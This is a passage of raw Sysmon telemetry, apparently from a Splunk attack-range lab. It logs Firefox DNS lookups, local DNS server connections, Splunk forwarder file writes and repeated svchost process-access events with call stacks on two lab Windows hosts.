11:26:27.310{C8EA50B7-11AA-6216-1605-000000003802}2228djvbdz1obemzo.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000299210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.306{C8EA50B7-11AA-6216-1605-000000003802}2228djvbdz1obemzo.cloudfront.net0143.204.208.179;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000299209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.306{C8EA50B7-11AA-6216-1605-000000003802}2228www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:143.204.208.179;C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000299208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.294{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51872- 354300x8000000000000000299207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.293{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56713- 354300x8000000000000000299206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.293{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58840- 354300x8000000000000000299205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.292{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61929- 354300x8000000000000000299204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.290{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53068- 354300x8000000000000000299203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.290{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61852- 23542300x8000000000000000299202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:29.360{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D44E648FF0FEE7CB26491F772ACE78AB,SHA256=9D5C7FBFD809FB1FB6A17AED9F2F83032B4ED36CE613BA5696B53ADFD90861EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:30.511{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=423788348663EE11946634881017504D,SHA256=1A98E2C546723E939D5D8F1D0281A1DA00C01A70B450FB975E21F9AEE9D861DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:30.496{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245A020837FC2796F3EAFAA1048C81AD,SHA256=897FAE7CCB89E2C07270B7FEFF68203E46348C560628423491E52E971F1C56C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:30.632{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\11824MD5=164FD424F4DAD52EA89EBF589092D0D3,SHA256=2D47C9DE4092D2BFEF32C9090EC7A6B85D3D2D27D205B34552A75F0BB041B07F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:30.374{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2718E69E457647B0AD72A76F47E59D20,SHA256=F73965539077E796319BCFCE37016482FC4C4B1E931E24ECB5081F5C124DEE5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:31.574{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1057CC73BFA452EAFCB878D8B754DAC,SHA256=CD95F4CAF06949DDCE1AF730E85EDA25F5CFA556D566BE39A62FA16DC0CC48C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.750{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 